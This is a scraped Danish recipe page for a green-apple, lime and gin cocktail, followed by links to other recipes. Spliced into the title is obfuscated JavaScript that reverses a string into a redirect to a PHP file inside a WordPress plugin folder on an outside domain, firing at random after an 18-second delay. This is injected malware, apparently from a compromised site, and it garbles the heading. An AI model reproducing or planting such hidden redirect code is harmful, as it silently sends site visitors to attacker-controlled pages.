Apple Sp$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andapple

En sur og sød drink – lige til nytårsaften eller en anden festlig lejlighed. Den smager dejligt at grønne æbler og lime og har et strejf af gin.

Opskrift til 1 pers.

Et low ball glas eller old fashioned
4 cl gin
2 cl Manzana Verde, æblelikør, fx fra Edmond Briottet
3 cl lime juice, friskpresset
1 cl sukkersirup
1 cl æggehvide
Is

Sådan gør du
Lav din egen sukkersirup ved at varme 2 dele sukker op med 1 del vand, til sukkeret er opløst.
Mos æbleterningerne godt i shakeren med en morter. Hæld alle ingredienserne ned til æblemosen og ryst grundigt. Fyld nu is i shakeren, og ryst grundigt igen. Fyld glasset med is, og hæld cocktailen i glasset gennem en si, og server.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere